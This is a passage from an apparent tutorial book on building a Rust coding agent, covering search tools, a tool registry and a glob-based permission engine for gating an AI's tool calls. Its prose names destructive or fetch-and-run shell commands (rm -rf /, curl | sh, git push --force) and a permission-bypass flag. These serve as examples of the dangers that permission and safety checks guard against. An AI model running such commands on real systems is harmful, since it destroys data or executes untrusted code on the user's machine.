test_grep_grep_with_include -- Creates code.rs and data.txt, both containing "hello world". Greps with include: "*.rs". Verifies only the .rs file appears in results.

test_grep_grep_no_matches -- Creates a file and greps for a pattern that does not appear. Verifies the result contains "no matches found".

test_grep_grep_regex -- Creates a file with foo123, bar456, baz789. Greps with the regex \d{3} (three digits). Verifies all three lines match, confirming real regex support rather than plain string matching.

test_grep_grep_nonexistent_path -- Greps a path that does not exist. Verifies the result is an error.

test_grep_grep_definition -- Verifies the tool definition has the name "grep".


Recap

This chapter added two search tools that let the agent discover and navigate code:

  • GlobTool finds files by name pattern. It takes a glob like **/*.rs and returns matching paths, one per line. It uses the glob crate for pattern matching and defaults to the current directory when no base path is provided.

  • GrepTool searches file contents by regex. It takes a pattern like fn main and returns matches in path:line_no: content format. It supports scoping to a file or directory and filtering by file type with the include parameter. Two helper functions split the work: search_file (async, handles I/O) and collect_files (sync, walks the directory tree).

  • Both tools are read-only. They never modify the filesystem. In a production agent with safety flags, they would be marked as read-only and concurrent-safe.

  • The separation is deliberate. Glob answers "what files exist?" Grep answers "where is this content?" Two tools with clear purposes are easier for the LLM to use correctly than one tool with a mode switch.

  • These are extensions. The starter does not include stubs for GlobTool or GrepTool. If you want to add them, create the files from scratch following the patterns shown above and register them in src/tools/mod.rs.

Key takeaway

Search tools are what turn a coding agent from a tool that edits known files into one that can explore and understand an unfamiliar codebase. The two-tool split (glob for names, grep for contents) maps directly to the two questions a developer asks when navigating code: "what files exist?" and "where is this thing?" Keeping them separate gives the LLM a clear, unambiguous interface for each question.

With search tools in place, the agent can now explore an unfamiliar codebase on its own. Given a prompt like "find and fix the bug in the parser," it can glob for source files, grep for the parser code, read the relevant files, and then use the write and edit tools from Chapter 9 to make changes. The tool suite is becoming complete.

Check yourself


← Chapter 10: Bash Tool · Contents · Chapter 12: Tool Registry →

Chapter 12: Tool Registry

File(s) to edit: src/types.rs (ToolSet) Test to run: cargo test -p mini-claw-code-starter test_multi_tool_ (integration tests) Estimated time: 30 min

You have five tools. You have a SimpleAgent. This chapter wires them together.

Goal

  • Build a default_tools() helper that assembles all tools into a single ToolSet so the agent can discover and dispatch them by name.
  • Wire the ToolSet to SimpleAgent so the LLM sees all tool schemas and the agent dispatches calls to the correct tool.
  • Handle unknown tool calls gracefully by returning an error string that lets the LLM recover.
  • Run the full integration test suite proving that real tools execute with real side effects inside the agent loop.

Over the past chapters you built the individual tools that let your agent interact with the world -- file reading and writing (Chapter 9), command execution (Chapter 10), and optionally pattern search (Chapter 11). Each tool implements the Tool trait, has a JSON schema, and returns a String. But they exist in isolation. The agent has no way to discover them, expose their schemas to the LLM, or dispatch calls by name.

The tool registry is the bridge. It holds every available tool in a single ToolSet, exposes their schemas to the LLM so it knows what it can call, and dispatches incoming tool calls to the correct implementation by name. By the end of this chapter, you will have a fully functional coding agent that can read, write, edit, and execute commands -- the complete tool loop, now with real tools instead of test doubles.

cargo test -p mini-claw-code-starter test_multi_tool_

The module layout

All tool implementations live under src/tools/, one file per tool:

src/tools/
  mod.rs       -- re-exports everything
  ask.rs       -- AskTool (bonus)
  bash.rs      -- BashTool
  edit.rs      -- EditTool
  read.rs      -- ReadTool
  write.rs     -- WriteTool

The mod.rs is a flat barrel file:

#![allow(unused)]
fn main() {
mod ask;
mod bash;
mod edit;
mod read;
mod write;

pub use ask::*;
pub use bash::BashTool;
pub use edit::EditTool;
pub use read::ReadTool;
pub use write::WriteTool;
}

Every tool is a separate file with a single public struct. The mod.rs re-exports the structs so downstream code can write use crate::tools::{ReadTool, WriteTool} without reaching into individual modules.

The flat structure is deliberate. There is no tools/file/mod.rs grouping ReadTool, WriteTool, and EditTool together. Why? Because tools are always referenced individually -- you register ReadTool::new(), not FileTools::all(). A flat module keeps the import paths short and the mental model simple. When you have 5 tools this is obviously fine. Claude Code has 40+ tools and still uses a similar flat layout -- each tool is its own module with a single export.


Key Rust concept: trait objects and dynamic dispatch

The ToolSet stores tools as Box<dyn Tool> -- a trait object that erases the concrete type. This means ReadTool, WriteTool, EditTool, and BashTool all become the same type behind a pointer, despite having different implementations. The HashMap<String, Box<dyn Tool>> is the collection that makes this work: it maps tool names to trait objects, so the agent can look up any tool by its string name at runtime.

This is dynamic dispatch. When the agent calls tool.call(args), the compiler does not know at compile time which call() method to invoke. It uses a vtable -- a function pointer table attached to the trait object -- to find the correct implementation at runtime. The cost is one pointer indirection per call, which is negligible compared to the I/O and network operations the tools perform.


Building a ToolSet

The ToolSet you defined in Chapter 4 is a HashMap<String, Box<dyn Tool>> with a builder API. Now we use it for real. Here is a helper function that assembles the standard tool set:

#![allow(unused)]
fn main() {
fn default_tools() -> ToolSet {
    ToolSet::new()
        .with(ReadTool::new())
        .with(WriteTool::new())
        .with(EditTool::new())
        .with(BashTool::new())
}
}

Four calls to .with(), one per tool. Each call constructs the tool, extracts its name from the ToolDefinition, and inserts it into the internal HashMap. The builder pattern means the order does not matter -- the tools are keyed by name, not position. (The AskTool requires an InputHandler, so it is registered separately when user input is needed.)

After construction, the ToolSet supports the operations the agent needs:

#![allow(unused)]
fn main() {
let tools = default_tools();

// Look up a tool by name (returns Option<&dyn Tool>)
let read = tools.get("read").unwrap();

// Get all schemas for the LLM
let defs: Vec<&ToolDefinition> = tools.definitions();
}

The definitions() method is what the SimpleAgent calls at the start of each loop iteration to tell the LLM which tools are available. Every definition includes the tool's name, description, and JSON Schema for its parameters. The LLM uses this information to decide when and how to call each tool.

The get() method is what the agent calls during tool dispatch -- the LLM says "name": "read", the agent does tools.get("read"), and calls the returned tool's .call() method with the provided arguments.


Tool categories (extension concept)

Not all tools are created equal. In the starter, the Tool trait is simplified to just definition() and call(). But in a production agent, tools carry metadata that classifies their behavior -- whether they are read-only, concurrent-safe, or destructive. These flags drive the permission engine, plan mode, and concurrent execution decisions.

Here is how the tools would be categorized:

Read-only tools: ReadTool (and GlobTool, GrepTool if added)

These tools observe the filesystem without changing it. Reading a file, listing paths by glob pattern, and searching content with regex -- none of these have side effects. They are safe to run in parallel and safe to run in a read-only plan mode.

Write tools: WriteTool, EditTool

Write and Edit modify files, so they are not read-only. They are not concurrent-safe because two writes to the same file would race. But they are not destructive either -- file writes are recoverable (you can revert with git).

Destructive tools: BashTool

The BashTool is the most dangerous. It can run arbitrary shell commands -- rm -rf /, git push --force, curl | sh. A production agent would mark it as destructive, requiring explicit user approval.

Why these categories matter

In a production agent, categories compose into a permission hierarchy:

CategoryPlan modeAuto-approveDefault mode
Read-onlyAllowedAllowedAllowed
WriteDeniedAllowedAsk user
DestructiveDeniedAsk userAsk user

The starter does not implement these categories yet -- that is an extension topic for later chapters. For now, the SimpleAgent executes every tool call the LLM requests without question.


Tool dispatch flow

Here is the complete flow from the LLM requesting a tool to the result being sent back:

flowchart TD
    A["LLM responds with<br/>StopReason::ToolUse"] --> B["For each ToolCall"]
    B --> C{"tools.get(name)?"}
    C -->|Some| D["tool.call(args)"]
    C -->|None| E["Return error:<br/>unknown tool"]
    D --> F["Push ToolResult<br/>into message history"]
    E --> F
    F --> G["Call provider.chat()<br/>with updated history"]
    G --> H{"StopReason?"}
    H -->|ToolUse| B
    H -->|Stop| I["Return final text"]

Wiring tools to the SimpleAgent

The SimpleAgent from the earlier chapters accepts tools through its builder API. You can add tools one at a time:

#![allow(unused)]
fn main() {
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .tool(EditTool::new())
    .tool(BashTool::new());
}

The .tool() method calls self.tools.push(t) internally, which extracts the tool's name from its definition and inserts it into the HashMap.

Once constructed, the agent handles the full dispatch pipeline. When the LLM responds with StopReason::ToolUse and a list of ToolCalls, the agent:

  1. Looks up each tool by name in the ToolSet
  2. Executes the tool with call()
  3. Packages the result as a Message::ToolResult and appends it to the conversation

If the LLM requests a tool that does not exist in the registry, the agent returns "error: unknown tool \foo`"`. The model sees the error and can adjust.


Integration: write, read, respond

The test_multi_tool_write_and_read_flow test demonstrates a complete three-turn interaction with real tools. Let's trace through it step by step.

The setup creates a temp directory and scripts a MockProvider with three responses:

#![allow(unused)]
fn main() {
let dir = tempfile::tempdir().unwrap();
let path = dir.path().join("test.txt");
let path_str = path.to_str().unwrap().to_string();

let provider = MockProvider::new(VecDeque::from([
    // Turn 1: write a file
    AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "c1".into(),
            name: "write".into(),
            arguments: json!({
                "path": path_str,
                "content": "hello from agent"
            }),
        }],
        stop_reason: StopReason::ToolUse,
        usage: None,
    },
    // Turn 2: read it back
    AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "c2".into(),
            name: "read".into(),
            arguments: json!({ "path": path_str }),
        }],
        stop_reason: StopReason::ToolUse,
        usage: None,
    },
    // Turn 3: final answer
    AssistantTurn {
        text: Some("Done! I wrote and read the file.".into()),
        tool_calls: vec![],
        stop_reason: StopReason::Stop,
        usage: None,
    },
]));
}

The agent is built with only the tools it needs:

#![allow(unused)]
fn main() {
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new());
}

Now trace the loop:

Turn 1 -- Write. The agent calls provider.chat(), gets back StopReason::ToolUse with a write tool call. It looks up "write" in the ToolSet, finds WriteTool, calls it with {"path": "/tmp/.../test.txt", "content": "hello from agent"}. The WriteTool creates the file on disk. The agent pushes the Message::Assistant(turn) and Message::ToolResult into the conversation history.

Message history after turn 1:

[User]         "write and read a file"
[Assistant]    tool_calls: [write(path, content)]
[ToolResult]   "wrote /tmp/.../test.txt"

Turn 2 -- Read. The agent calls provider.chat() again with the updated history. The mock returns a read tool call. The agent looks up "read", calls ReadTool with {"path": "/tmp/.../test.txt"}. The ReadTool reads the file that WriteTool created in the previous turn and returns its content.

Message history after turn 2:

[User]         "write and read a file"
[Assistant]    tool_calls: [write(path, content)]
[ToolResult]   "wrote /tmp/.../test.txt"
[Assistant]    tool_calls: [read(path)]
[ToolResult]   "hello from agent"

Turn 3 -- Final answer. The agent calls provider.chat() one more time. The mock returns StopReason::Stop with text. The agent pushes the final assistant message and returns the text to the caller.

The test verifies two things: the returned text contains "Done!", and the file actually exists on disk with the expected content. This confirms that real tools executed with real side effects inside the agent loop.

#![allow(unused)]
fn main() {
let result = agent.run("write and read a file").await.unwrap();
assert!(result.contains("Done!"));
assert_eq!(
    std::fs::read_to_string(&path).unwrap(),
    "hello from agent"
);
}

Error recovery: the hallucinated tool

The test_simple_agent_unknown_tool test demonstrates what happens when the LLM requests a tool that does not exist. This is not a hypothetical scenario -- models regularly hallucinate tool names, especially smaller models or when the tool list is long.

The mock provider scripts two responses:

#![allow(unused)]
fn main() {
let provider = MockProvider::new(VecDeque::from([
    // LLM hallucinates a tool
    AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "c1".into(),
            name: "imaginary_tool".into(),
            arguments: json!({}),
        }],
        stop_reason: StopReason::ToolUse,
        usage: None,
    },
    // LLM recovers after seeing the error
    AssistantTurn {
        text: Some("Sorry, that tool doesn't exist.".into()),
        tool_calls: vec![],
        stop_reason: StopReason::Stop,
        usage: None,
    },
]));

let agent = SimpleAgent::new(provider).tool(ReadTool::new());
let result = agent.run("do something").await.unwrap();
assert!(result.contains("doesn't exist"));
}

Here is what happens:

Turn 1. The LLM asks to call "imaginary_tool". The agent does tools.get("imaginary_tool"), gets None, and returns "error: unknown tool \imaginary_tool`". This error message is pushed into the conversation as a Message::ToolResult`. The loop continues.

Turn 2. The LLM sees the error in the conversation history and produces a text response acknowledging the mistake. The agent returns normally.

The agent did not crash. It did not panic. It did not return an Err. It treated the unknown tool as a recoverable error and let the model recover. This is the correct behavior for a production agent. Models make mistakes. The agent should be resilient to them.

The same pattern handles other failure modes: a tool that returns an execution error or a tool that encounters an I/O failure. In every case, the model sees a descriptive error message and can adjust its approach.


How Claude Code does it

Claude Code's tool registry is substantially larger, but the architecture is the same.

Scale. Claude Code registers 40+ tools spanning file operations, git, browser, notebooks, MCP (Model Context Protocol), and more. Each tool has permission metadata, cost hints, and rich terminal rendering. Our five tools (four core plus AskTool) cover the essential capabilities -- the same protocol, less surface area.

Dynamic registration. Our ToolSet is built at startup and never changes. Claude Code's registry is dynamic -- MCP tools are discovered and registered at runtime when a user configures an MCP server. A tool can appear or disappear mid-session. The ToolSet::push() method you built in Chapter 4 supports this pattern, though we do not exercise it yet.

Tool groups. Claude Code organizes tools into permission groups. File tools, git tools, and shell tools each have group-level allow/deny rules. Our flat ToolSet is simpler -- the permission engine (when implemented) would check per-tool metadata.

Usage statistics. Claude Code tracks how often each tool is called, how long each call takes, and how many tokens each result consumes. This data feeds into the TUI's status display and helps with cost estimation. Our book does not cover usage statistics, though the TokenUsage type from Chapter 4 gives you a starting point at the message level.

Despite these differences, the core protocol is identical. The LLM sees a list of tool schemas. It decides to call one. The agent looks up the tool by name, executes it, and feeds the result back. Everything else -- permissions, groups, statistics, dynamic registration -- is orchestration around that lookup.


Tests

Run the integration tests:

cargo test -p mini-claw-code-starter test_multi_tool_

Key tests:

  • test_multi_tool_write_and_read_flow -- Agent writes a file then reads it back, verifying the file exists on disk with correct content.
  • test_multi_tool_edit_flow -- Agent edits an existing file with string replacement and reads back the result.
  • test_multi_tool_bash_then_report -- Agent runs a shell command and reports the output.
  • test_multi_tool_write_edit_read_flow -- Full pipeline: write initial content, edit it, read it back. Confirms tools chain correctly.
  • test_multi_tool_all_four_tools -- Agent uses bash, write, edit, and read in a single session, exercising the full tool set.
  • test_multi_tool_multiple_writes -- Agent writes two separate files in sequence.
  • test_multi_tool_read_multiple_files -- Agent reads two files in a single turn using parallel tool calls.
  • test_multi_tool_five_step_conversation -- A five-step flow (bash, write, read, edit, read) verifying long multi-tool sessions.
  • test_multi_tool_chat_basic -- Verifies the chat() method for simple text-only responses.
  • test_multi_tool_chat_with_tool_call -- Verifies chat() with tool dispatch and message history growth.
  • test_multi_tool_chat_multi_turn -- Two-turn conversation using chat() with accumulating message history.

Key takeaway

The tool registry is a HashMap lookup: the LLM produces a tool name, the agent finds the matching implementation, and calls it. This indirection -- name-based dispatch through trait objects -- is what lets you add or remove tools without changing the agent loop.


Recap

Part II is complete. Over four chapters you built every tool a basic coding agent needs:

  • ReadTool reads files with line numbers, offsets, and limits.
  • WriteTool creates and overwrites files, creating parent directories as needed.
  • EditTool performs surgical string replacements within existing files.
  • BashTool executes shell commands with timeout support and exit code reporting.
  • GlobTool finds files by pattern matching across the directory tree.
  • GrepTool searches file contents with regex and context lines.

In this chapter you wired them all together through the ToolSet registry and connected them to the SimpleAgent. The agent can now receive a user prompt, send it to the LLM with all tool schemas, execute whatever tools the model requests, and loop until the model produces a final answer. You have a working coding agent.

But a working agent is not a safe agent. Right now, the engine executes every tool call the LLM requests without question. If the model decides to bash("rm -rf /"), the engine runs it. If it writes over your source files with garbage, the engine writes. There are no guardrails, no confirmation prompts, no safety checks. The tool flags (is_read_only, is_destructive) exist but nothing enforces them.


What's next

Part III -- Safety & Control -- adds the guardrails that turn a working agent into a trustworthy one:

  • Chapter 13: Permission Engine -- The system that checks every tool call before execution. It evaluates permission rules, respects the permission mode, and asks the user when needed.
  • Chapter 14: Safety Checks -- Static analysis of tool arguments. Catches dangerous patterns (rm -rf, git push --force) before the permission prompt even appears.
  • Chapter 15: Hook System -- Pre-tool and post-tool hooks that run shell commands around tool execution. Lets users enforce custom policies (run linters after edits, block certain paths).
  • Chapter 16: Plan Mode -- A restricted execution mode where only read-only tools run. The agent can analyze and plan but never modify. This is where is_read_only() finally gets enforced.

The tools you built in Part II are the hands. Part III teaches the agent when to use them -- and when not to.

Check yourself


← Chapter 11: Search Tools · Contents · Chapter 13: Permission Engine →

Chapter 13: Permission Engine

File(s) to edit: src/permissions.rs Test to run: cargo test -p mini-claw-code-starter permissions Estimated time: 40 min

Your agent does whatever the LLM tells it to.

Think about that for a moment. In Chapters 1-12 you built a fully functional coding agent with several tools. The LLM can read files, write files, edit files, and execute arbitrary shell commands. The SimpleAgent dutifully dispatches every tool call the model requests. If the model says bash("rm -rf /"), the agent runs it. If it writes garbage over your source files, the agent writes. If it decides to curl | sh something from the internet, the agent curls. There is nothing between the LLM's request and the tool's execution.

This is fine for a tutorial. It is not fine for software you run on your actual codebase.

Chapter 13 changes that. We build the PermissionEngine -- the gatekeeper that evaluates every tool call before it executes. It sits between the SimpleAgent and the tools, and for each call it returns one of three answers: allow it silently, deny it, or ask the user for approval. The decision depends on configured rules, a default permission, and whether the user has already approved this tool during the session.

This is the first chapter of Part III: Safety & Control. By the end of it, your agent will no longer blindly obey the LLM. It will ask permission first.

cargo test -p mini-claw-code-starter permissions

Goal

  • Implement PermissionRule::matches() using glob::Pattern so rules can match tool names with wildcards (e.g., "mcp__*" matches all MCP tools).
  • Build the PermissionEngine with its three-stage evaluation pipeline: session approvals, then ordered rules, then default permission.
  • Provide convenience constructors (ask_by_default, allow_all) for common configurations.
  • Record session approvals so that once a user approves a tool, it stays approved for the rest of the session.

The problem: a spectrum of trust

Not every tool call is equally risky. Reading a file is harmless. Writing a file is recoverable (you can revert with git). Running rm -rf / is catastrophic. A good permission system should treat these differently.

At the same time, not every user wants the same level of control. Some users want to approve every action. Some want to approve only dangerous ones. Some are running automated pipelines and want no prompts at all. And some are in planning mode, where the agent should only observe, never modify.

This gives us two dimensions to work with:

  1. Tool risk level -- How dangerous is this tool?
  2. User trust level -- How much control does the user want? (The permission rules and default permission.)

The permission engine combines both dimensions into a single decision. Rules match tool names using glob patterns, and a default permission applies when no rule matches. This gives users fine-grained control over which tools require approval.


Permission types

The permission system introduces several new types in src/permissions.rs. Let's walk through each one.

Permission: the decision

#![allow(unused)]
fn main() {
#[derive(Debug, Clone, PartialEq)]
pub enum Permission {
    /// Tool call is allowed without asking.
    Allow,
    /// Tool call is blocked without asking.
    Deny,
    /// User must be prompted for approval.
    Ask,
}
}

Three variants, one for each possible outcome. Allow means execute immediately -- no prompt, no delay. Deny means block the call entirely -- the tool never runs. Ask means pause and show the user a prompt.

In the starter, Deny and Ask are unit variants with no string payload. The caller is responsible for providing context to the user or the model when a tool call is denied or needs approval.

PermissionRule: matching tool names

#![allow(unused)]
fn main() {
#[derive(Debug, Clone)]
pub struct PermissionRule {
    /// Glob pattern matching tool names (e.g. "bash", "write", "*").
    pub tool_pattern: String,
    /// The permission to assign when the pattern matches.
    pub permission: Permission,
}
}

Rules let users assign permissions to specific tools. A PermissionRule matches tool names with a glob pattern (using the glob::Pattern crate) and assigns a permission: always allow, always deny, or always ask.

For example, you might add a rule that allows write without prompting -- because you trust the model with file writes in this particular project. Or you might add a rule that denies bash entirely -- because this is a read-heavy analysis task and you want to prevent any command execution.

The matches() method uses glob::Pattern for matching:

#![allow(unused)]
fn main() {
impl PermissionRule {
    pub fn new(tool_pattern: impl Into<String>, permission: Permission) -> Self {
        Self {
            tool_pattern: tool_pattern.into(),
            permission,
        }
    }

    /// Check if this rule matches a tool name.
    /// Uses glob::Pattern for pattern matching, falling back to
    /// exact string comparison if the pattern is invalid.
    pub fn matches(&self, tool_name: &str) -> bool {
        // Your implementation: use glob::Pattern::new(&self.tool_pattern)
        unimplemented!()
    }
}
}

Rules take priority over the default permission. This is the key design principle: specific overrides beat general policies.


The PermissionEngine

With the types defined, we can build the engine itself. Open src/permissions.rs:

#![allow(unused)]
fn main() {
pub struct PermissionEngine {
    rules: Vec<PermissionRule>,
    default_permission: Permission,
    /// Session-level overrides (tool calls the user has already approved).
    session_allows: std::collections::HashSet<String>,
}
}

Three fields:

  • rules -- An ordered list of permission rules. First match wins.
  • default_permission -- The fallback permission when no rule matches. Typically Permission::Ask for interactive use or Permission::Allow for bypass mode.
  • session_allows -- A set of tool names the user has approved during this session.

The constructors provide common configurations:

#![allow(unused)]
fn main() {
impl PermissionEngine {
    pub fn new(rules: Vec<PermissionRule>, default_permission: Permission) -> Self {
        // Your implementation: store rules, default_permission, and empty session_allows HashSet
        unimplemented!()
    }

    /// Create an engine that asks for everything by default.
    pub fn ask_by_default(rules: Vec<PermissionRule>) -> Self {
        Self::new(rules, Permission::Ask)
    }

    /// Create an engine that allows everything (no permission checks).
    pub fn allow_all() -> Self {
        Self::new(vec![], Permission::Allow)
    }
}
}

ask_by_default() is the standard interactive configuration -- every tool that is not covered by a rule prompts the user. allow_all() is the bypass mode -- no rules, no prompts. Session approvals start empty and accumulate as the user interacts with the agent.


The evaluate pipeline

The core of the engine is the evaluate method. It takes a tool name and the tool arguments, and returns a Permission. The pipeline has three stages, evaluated in order. The first stage that produces a definitive answer wins.

flowchart TD
    A["evaluate(tool_name, args)"] --> B{"tool_name in<br/>session_allows?"}
    B -->|Yes| C["Return Allow"]
    B -->|No| D{"Any rule<br/>matches?"}
    D -->|Yes| E["Return rule.permission"]
    D -->|No| F["Return default_permission"]
#![allow(unused)]
fn main() {
pub fn evaluate(&self, tool_name: &str, _args: &Value) -> Permission {
    // Stage 1: session approvals
    if self.session_allows.contains(tool_name) {
        return Permission::Allow;
    }

    // Stage 2: rules in order (first match wins)
    for rule in &self.rules {
        if rule.matches(tool_name) {
            return rule.permission.clone();
        }
    }

    // Stage 3: default
    self.default_permission.clone()
}
}

Let's walk through each stage.

Stage 1: Session approvals

#![allow(unused)]
fn main() {
if self.session_allows.contains(tool_name) {
    return Permission::Allow;
}
}

If the user has already approved this tool during the current session, allow it immediately. Session approvals are recorded when the user says "yes" to an Ask prompt. Once approved, the tool runs without prompting for the rest of the session.

Session approvals are per-tool, not global. Approving write does not approve bash. This is deliberate -- the user should make a conscious choice for each tool they trust.

Stage 2: Permission rules

#![allow(unused)]
fn main() {
for rule in &self.rules {
    if rule.matches(tool_name) {
        return rule.permission.clone();
    }
}
}

If no session approval matched, we check the configured rules. Rules are evaluated in order -- the first rule whose matches() method returns true wins.

This is a critical design choice: first match wins. If you have two rules:

1. bash  -> Deny
2. *     -> Allow

Then bash hits rule 1 and is denied. Everything else hits rule 2 and is allowed. If the order were reversed, rule 2 would match everything first and rule 1 would never fire.

The matches() method uses glob::Pattern for matching, which gives you more expressive patterns than simple string comparison. "bash" matches only "bash". "*" matches everything. "file_*" matches "file_read", "file_write", etc.

Stage 3: Default permission

#![allow(unused)]
fn main() {
self.default_permission.clone()
}

If no session approval matched and no rule matched, fall back to the default permission set at construction time. For ask_by_default(), this is Permission::Ask. For allow_all(), this is Permission::Allow.


Key Rust concept: the glob::Pattern crate

The glob crate provides filesystem-style pattern matching. glob::Pattern::new("mcp__*") compiles a pattern, and .matches("mcp__fs__read") tests a string against it. The key operators are * (match any sequence of characters), ? (match any single character), and [abc] (match any character in the set). Unlike regex, glob patterns are intentionally simple -- they match whole strings, not substrings, and have no backtracking. This makes them fast and easy to reason about for tool name matching.

The Pattern::new() call returns a Result because the pattern string might be syntactically invalid (e.g., an unclosed bracket). The fallback to exact string comparison handles this edge case gracefully.


Pattern matching with glob

The PermissionRule::matches() method uses the glob crate for pattern matching:

#![allow(unused)]
fn main() {
pub fn matches(&self, tool_name: &str) -> bool {
    glob::Pattern::new(&self.tool_pattern)
        .map(|p| p.matches(tool_name))
        .unwrap_or(self.tool_pattern == tool_name)
}
}

Two cases:

  • Valid glob pattern -- glob::Pattern::new() succeeds. The pattern is matched against the tool name using glob semantics: "*" matches everything, "file_*" matches "file_read", "file_write", etc., and "bash" matches only "bash".
  • Invalid glob -- Falls back to exact string comparison. This is a safety net -- in practice, tool name patterns are simple and always valid.

Using glob::Pattern instead of hand-rolled matching gives us full glob semantics -- character classes ([abc]), alternatives, and proper wildcard handling -- with no custom code.


Session approvals

When evaluate returns Permission::Ask, the caller (typically the SimpleAgent or UI layer) prompts the user. If the user says yes, the caller records the approval:

#![allow(unused)]
fn main() {
pub fn record_session_allow(&mut self, tool_name: &str) {
    self.session_allows.insert(tool_name.to_string());
}
}

Subsequent calls to evaluate for the same tool will find it in the session_allows set (stage 1) and return Permission::Allow without prompting again.

The engine also provides convenience methods for checking permission outcomes:

#![allow(unused)]
fn main() {
pub fn is_allowed(&self, tool_name: &str, args: &Value) -> bool {
    matches!(self.evaluate(tool_name, args), Permission::Allow)
}

pub fn needs_approval(&self, tool_name: &str, args: &Value) -> bool {
    matches!(self.evaluate(tool_name, args), Permission::Ask)
}
}

Three properties of session approvals are worth emphasizing:

  1. Per-tool, not global. Approving write does not approve bash. Each tool is a separate trust decision.
  2. Session-scoped, not persistent. Approvals live in memory and vanish when the process exits. There is no file, no database, no persistence. If you restart the agent, you start with a clean slate.
  3. Above rules in priority. In the starter, session approvals are checked first (stage 1), so an approval overrides any rule. This is a deliberate simplification -- once the user says yes, the tool is approved for the session regardless of rules.

Putting it all together: a complete trace

Let's trace through a realistic scenario to see how the pipeline works end to end.

A user starts the agent with ask_by_default and one rule: write is always allowed.

#![allow(unused)]
fn main() {
let engine = PermissionEngine::ask_by_default(vec![
    PermissionRule::new("write", Permission::Allow),
]);
}

Now the LLM makes three tool calls in sequence. Here is what happens at each one:

Call 1: read("src/main.rs")

Stage 1: "read" not in session_allows. -> continue
Stage 2: Rule "write" does not match "read". No more rules. -> continue
Stage 3: Default permission is Ask. -> Ask

Result: Ask. The UI prompts the user. (Note: in the starter there are no is_read_only() flags on tools, so read tools go through the same pipeline as any other tool.)

Call 2: write("src/main.rs", ...)

Stage 1: "write" not in session_allows. -> continue
Stage 2: Rule "write" matches "write". Permission: Allow. -> Allow

Result: Allow. The write executes silently -- the rule overrides what the default permission would normally do (ask the user).

Call 3: bash("cargo test")

Stage 1: "bash" not in session_allows. -> continue
Stage 2: Rule "write" does not match "bash". No more rules. -> continue
Stage 3: Default permission is Ask. -> Ask

Result: Ask. The UI prompts the user. If the user approves, the caller calls engine.record_session_allow("bash"), and subsequent bash calls will be allowed via stage 1.


How the engine integrates with the SimpleAgent

The PermissionEngine is designed to be called from inside the SimpleAgent's tool execution flow. The integration point is conceptually simple:

For each tool call from the LLM:
    1. Look up the tool in the ToolSet
    2. Call permission_engine.evaluate(tool_name, args)
    3. Match on the Permission:
       - Allow  -> execute the tool
       - Deny   -> return an error string to the LLM
       - Ask    -> prompt the user, then execute or deny

We will wire this up fully in later chapters. For now, the PermissionEngine is a standalone component with a clean interface: give it a tool name and arguments, get back a decision. This separation makes it testable in isolation -- which is exactly what the chapter 10 tests do.


How Claude Code does it

Claude Code's permission system follows the same architecture but with more granularity.

Permission modes. Claude Code has the same core modes -- a default interactive mode, an auto-approve mode, and a plan mode. The mode is set via CLI flags (--dangerously-skip-permissions for bypass, --plan for plan mode) or interactively during the session.

Tool groups. Rather than individual tool flags, Claude Code organizes tools into permission groups. File tools, git tools, shell tools, and MCP tools each have group-level policies. A single rule can allow or deny an entire group. Our glob-based tool patterns achieve a similar effect with patterns like "file_*".

Per-path rules. Claude Code's rules can match not just tool names but also tool arguments -- specifically file paths. A rule like "allow write to src/**" permits writes within the source directory but blocks writes elsewhere. Our rules match only on tool names, which is simpler but less precise.

Session approvals. Claude Code's session approval system works the same way -- once the user approves a tool, it stays approved for the session. The approval is per-tool-name, stored in memory, and cleared on session reset.

Layered evaluation. The evaluation pipeline is the same: check session approvals, then match rules, then fall back to defaults. The ordering ensures that specific policies override general ones, just as in our implementation.

The core insight is the same in both systems: the permission engine is a function from (rules, session_state, default_permission) to Permission. It does not execute tools. It does not modify state (except session approvals). It just answers the question: should this tool call proceed?


Tests

Run the permission engine tests:

cargo test -p mini-claw-code-starter permissions

Key tests:

  • test_permissions_allow_all -- allow_all() returns Allow for every tool, confirming bypass mode works.
  • test_permissions_ask_by_default -- ask_by_default() with no rules returns Ask for any tool.
  • test_permissions_rule_matching -- Three explicit rules for read, bash, and write return their respective permissions.
  • test_permissions_glob_pattern -- A glob rule "mcp__*" matches "mcp__fs__read" but not "read".
  • test_permissions_first_rule_wins -- Two rules for "bash" (Allow then Deny); first match wins, so Allow is returned.
  • test_permissions_session_allow -- After record_session_allow("bash"), a tool that previously returned Ask now returns Allow.
  • test_permissions_session_allow_per_tool -- Approving "read" does not approve "write" -- session approvals are per-tool.
  • test_permissions_is_allowed / test_permissions_needs_approval -- Convenience methods correctly reflect the underlying evaluate() result.
  • test_permissions_wildcard_rule -- A "*" rule overrides the default permission for all tools.
  • test_permissions_deny_overrides_default -- A Deny rule for "dangerous" blocks it even when the default is Allow.

Key takeaway

The permission engine is a pure function from (tool_name, rules, session_state, default) to Permission. It does not execute tools or interact with the user -- it just answers the question "should this proceed?" This separation makes it trivially testable and reusable across different UI contexts.


Recap

In this chapter you built the PermissionEngine -- the gatekeeper between the LLM's requests and your tools. The key ideas:

  • Three outcomes -- Allow, Deny, Ask. Every tool call gets one of these before it runs.
  • Ordered pipeline -- Session approvals first, then rules, then default permission. Specific policies beat general ones.
  • Glob-pattern rules -- Rules use glob::Pattern for tool name matching. The first matching rule wins. This gives users fine-grained control over which tools require approval.
  • Session approvals -- Once the user says yes, that tool is approved for the session. Per-tool, in-memory, not persistent.
  • Convenience constructors -- ask_by_default() for interactive use, allow_all() for bypass mode.

The engine is pure logic -- it does not execute tools, and it does not interact with the user. It takes a tool name and arguments, and returns a decision. This separation makes it testable, composable, and easy to reason about.


What's next

The permission engine decides whether a tool call should run based on who the tool is and what mode the user is in. But it does not look at what the tool is being asked to do. A bash tool is bash whether it runs ls or rm -rf /. A write tool is a write tool whether it targets src/main.rs or .env.

Chapter 14 adds safety checks -- static analysis of tool arguments that catches dangerous patterns before the permission prompt even appears. It validates paths against allowed directories, matches filenames against protected patterns (.env, .git/config), and filters bash commands for blocked patterns (rm -rf /, sudo, fork bombs). Safety checks wrap tools so that dangerous calls are blocked before they execute.

Check yourself


← Chapter 12: Tool Registry · Contents · Chapter 14: Safety Checks →

Chapter 14: Safety Checks

File(s) to edit: src/safety.rs Test to run: cargo test -p mini-claw-code-starter safety Estimated time: 40 min

